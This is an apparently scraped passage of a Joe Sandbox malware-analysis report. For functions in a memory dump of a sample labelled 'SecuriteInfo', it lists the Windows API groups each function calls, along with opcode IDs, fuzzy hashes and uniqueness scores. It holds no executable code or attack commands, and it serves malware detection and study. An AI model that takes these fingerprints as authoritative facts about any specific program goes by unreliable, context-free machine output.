                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyOffsetParent
                                                                            • String ID:
                                                                            • API String ID: 3819956977-0
                                                                            • Opcode ID: 95e072499462306d46b0167690d9bb3a77eb6cc0a87a25c7d4317ed0bd38fa78
                                                                            • Instruction ID: c3d03b80bdafaba8d5c4d597e87ec3106444f82193d1fb542ac17ea60ad1883f
                                                                            • Opcode Fuzzy Hash: 95e072499462306d46b0167690d9bb3a77eb6cc0a87a25c7d4317ed0bd38fa78
                                                                            • Instruction Fuzzy Hash: C3316036601681D7DB59CB27E68479973A1FB8CB84F04C025DB5E87BA5EF38E460C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005C454 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$GroupItemNext$EnabledLongParentRedraw
                                                                            • String ID:
                                                                            • API String ID: 2934814974-0
                                                                            • Opcode ID: 4ada5e95ed0d014fdb6789e21436ae31e14ba63253ba0d09c18a0f1ec0e47f67
                                                                            • Instruction ID: 3a920cd360b95adb34fb5c75bf41c6d17e247e378a0aad47cb2160025958b3e9
                                                                            • Opcode Fuzzy Hash: 4ada5e95ed0d014fdb6789e21436ae31e14ba63253ba0d09c18a0f1ec0e47f67
                                                                            • Instruction Fuzzy Hash: B931C232711A5085FB56DB23E559BEA23E1E78DFC0F481020FF4A1BBA5EE7AD4818700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017A0C4 Relevance: 6.1, APIs: 4, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Create$BitmapBrushPattern
                                                                            • String ID:
                                                                            • API String ID: 3280665104-0
                                                                            • Opcode ID: 8b89a59ff4f686e3168d13f816cc6e1677d858596a705abfdf61e9bac59f3ac7
                                                                            • Instruction ID: 2660ca19d9b486403bb7d1666a4ab8f856548dd3bf2f3bf28cca368ca9fb7b6d
                                                                            • Opcode Fuzzy Hash: 8b89a59ff4f686e3168d13f816cc6e1677d858596a705abfdf61e9bac59f3ac7
                                                                            • Instruction Fuzzy Hash: 8F315436B10A4099E701CFB2D848BDD37B5F748798F114229DE992BBA8DF79CA49C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400447D4 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CaptureExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 4269541544-0
                                                                            • Opcode ID: 89c370427e6c129ca020539a86d81e13c3361de29c7cdb3c517b144c372e6020
                                                                            • Instruction ID: 5647a779f0103945b8853082137ecd68faa50d223d7264888b7e092a9260f11f
                                                                            • Opcode Fuzzy Hash: 89c370427e6c129ca020539a86d81e13c3361de29c7cdb3c517b144c372e6020
                                                                            • Instruction Fuzzy Hash: E121AE3671069082EB219B66E595BAE2760FBCDFC8F584015EF0807F65DFB9C4118B44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140052820 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeGlobalLoadLock
                                                                            • String ID:
                                                                            • API String ID: 3898064442-0
                                                                            • Opcode ID: a49d86ff4c02732de2cae908410566f00872496c7d233b15af2aedf6b78e7c8d
                                                                            • Instruction ID: 6396b2f4822d17d21fe02d8ca357f19beec1d17214c3895e207180b339210ea0
                                                                            • Opcode Fuzzy Hash: a49d86ff4c02732de2cae908410566f00872496c7d233b15af2aedf6b78e7c8d
                                                                            • Instruction Fuzzy Hash: FB215035602B8181EB56EB5395543EDA7A1EF8DFD4F098421FF490BBA9DF39C4818300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400506FC Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateCreateDeactivateDebugDialogIndirectOutputParamString
                                                                            • String ID:
                                                                            • API String ID: 475891805-0
                                                                            • Opcode ID: d88a8087bbbe54ca75af1e7a50d9bdf41be3913e0fef696c103c3c00766741d5
                                                                            • Instruction ID: f9761eb50b71cd9cf4c22c2fc3b65b6dad59b5743b42679a0271525772433746
                                                                            • Opcode Fuzzy Hash: d88a8087bbbe54ca75af1e7a50d9bdf41be3913e0fef696c103c3c00766741d5
                                                                            • Instruction Fuzzy Hash: EA214F35A14B4985FB52CF53A48879EA2E5F75CBD0F144025EB49477F4CBB8D846CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140076428 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CallCursorHookNextWindow
                                                                            • String ID:
                                                                            • API String ID: 3719484595-0
                                                                            • Opcode ID: d6e933d3c143d465a2df9c32cfcb6dfd97fe8579f4639d93d840c917cc6ac130
                                                                            • Instruction ID: 6dbe3aa4d73e3ab352a695cf67dccf78d9f3f150eed419816eafe2b1d1156e0c
                                                                            • Opcode Fuzzy Hash: d6e933d3c143d465a2df9c32cfcb6dfd97fe8579f4639d93d840c917cc6ac130
                                                                            • Instruction Fuzzy Hash: CC214F76224A4481FA629B27E85C7A667A0F78CBE9F180111EB8E477B4CF7CC945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016E6B8 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: c98e1648cdcdb261d477cee59c99308557e3c409976aa8185f2f0406b67515bc
                                                                            • Instruction ID: 903ccc5247ad050d3764e8bd27d144568a783df9b9aeb36a463d3b8d0765fc31
                                                                            • Opcode Fuzzy Hash: c98e1648cdcdb261d477cee59c99308557e3c409976aa8185f2f0406b67515bc
                                                                            • Instruction Fuzzy Hash: 4E116D36701A8082F7518B62EC95BEF26A1FBC9F84F585531DF4A4BBA5CF38C4418740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400D0818 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Child$FocusMessageSend
                                                                            • String ID:
                                                                            • API String ID: 287298614-0
                                                                            • Opcode ID: 79667f0105e09594d4777bc29f81c58953d933d58b134f11409fe5a98ad61ace
                                                                            • Instruction ID: cd3e499f92a2d2961979687e2222416b143ae760e750a8b6bdacce8ae3f22018
                                                                            • Opcode Fuzzy Hash: 79667f0105e09594d4777bc29f81c58953d933d58b134f11409fe5a98ad61ace
                                                                            • Instruction Fuzzy Hash: 97115135702A4082FB668B57F5547AE6761EF88FC4F084431EF8E8BBA4DE75D8429360
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140184324 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: BackgroundDrawRectTheme$EmptyInflate
                                                                            • String ID:
                                                                            • API String ID: 1053687596-0
                                                                            • Opcode ID: f7765a653184a3b86659a6c33cda2ba7717c5b33a6821583988fb6274baed85b
                                                                            • Instruction ID: b70dd0299b00accb5161f163128cd3fd2d26307a14101fc67820cff07a59790e
                                                                            • Opcode Fuzzy Hash: f7765a653184a3b86659a6c33cda2ba7717c5b33a6821583988fb6274baed85b
                                                                            • Instruction Fuzzy Hash: B0212177615A9086E7718F12E544BAEB365F7DCB84F149221DF8907A68DF38C694C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C8278 Relevance: 6.1, APIs: 4, Instructions: 53fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                            • String ID:
                                                                            • API String ID: 892977027-0
                                                                            • Opcode ID: ab47630339a5bdec6fbb5f7cdbb6ca77c1ae0dab519a7eace5fc290dc5bd3224
                                                                            • Instruction ID: a33a0702bf110e2387279b50f5be4b21dba5e82aeaff284b83a1ca386e9febca
                                                                            • Opcode Fuzzy Hash: ab47630339a5bdec6fbb5f7cdbb6ca77c1ae0dab519a7eace5fc290dc5bd3224
                                                                            • Instruction Fuzzy Hash: AE113D3A318B8481EA25EB27E498BDA6761F7CDF90F454122DF9947BA1CF78C546C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140048188 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateClassDeactivateDebugOutputRegisterString
                                                                            • String ID:
                                                                            • API String ID: 312599135-0
                                                                            • Opcode ID: 4b98508fcf1ec5efb78129d73d2f1636756b748edc29b9f6ef9c9414967032d7
                                                                            • Instruction ID: 644b0a47562aae0173907a21326d1cacf2c3209b8be7eb5d6f22b7ac8e65e4f1
                                                                            • Opcode Fuzzy Hash: 4b98508fcf1ec5efb78129d73d2f1636756b748edc29b9f6ef9c9414967032d7
                                                                            • Instruction Fuzzy Hash: D5116D35200B5082E6629F13E5443AEA7E5F78CBD1F461969EF85676F0CB78C8928B44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140048014 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateClassDeactivateDebugInfoOutputString
                                                                            • String ID:
                                                                            • API String ID: 2706167345-0
                                                                            • Opcode ID: 2c6bfacf2784c20d28abb4ffbca830f23adfce5b78e8290a8c266ecd03bc5a90
                                                                            • Instruction ID: 4f47d002c85be0494360afa8f73dd95da848fba9f18be7c0806267dea18e8937
                                                                            • Opcode Fuzzy Hash: 2c6bfacf2784c20d28abb4ffbca830f23adfce5b78e8290a8c266ecd03bc5a90
                                                                            • Instruction Fuzzy Hash: 9411907561071086FBA28B2398483A966E0B79CBD0F064539DF44473F4CBB8C8898B44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401427C4 Relevance: 6.0, APIs: 4, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect$ReleaseVisibleWindow
                                                                            • String ID:
                                                                            • API String ID: 617111112-0
                                                                            • Opcode ID: 9a6ea002d69ef3a087d997c5066d654ee9c701269c09f1d10903c7b0075d4e4a
                                                                            • Instruction ID: d8ce4ad9985786ca858d48c7f56b98e7be709665bce5e5ed1deece19b55462a4
                                                                            • Opcode Fuzzy Hash: 9a6ea002d69ef3a087d997c5066d654ee9c701269c09f1d10903c7b0075d4e4a
                                                                            • Instruction Fuzzy Hash: 4D112536305A4181EA16DB22E9543ED6361FB89FE0F494225DBAE47BF5DF38C561C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014002A170 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 951cd432f0cf610a23d8feaa701ec3c654529af0a2ccd26c535ed7e557443f75
                                                                            • Instruction ID: 5897577eb74bd5ee80fa1a39d3e8243519d405be718c142350519bd3cac89733
                                                                            • Opcode Fuzzy Hash: 951cd432f0cf610a23d8feaa701ec3c654529af0a2ccd26c535ed7e557443f75
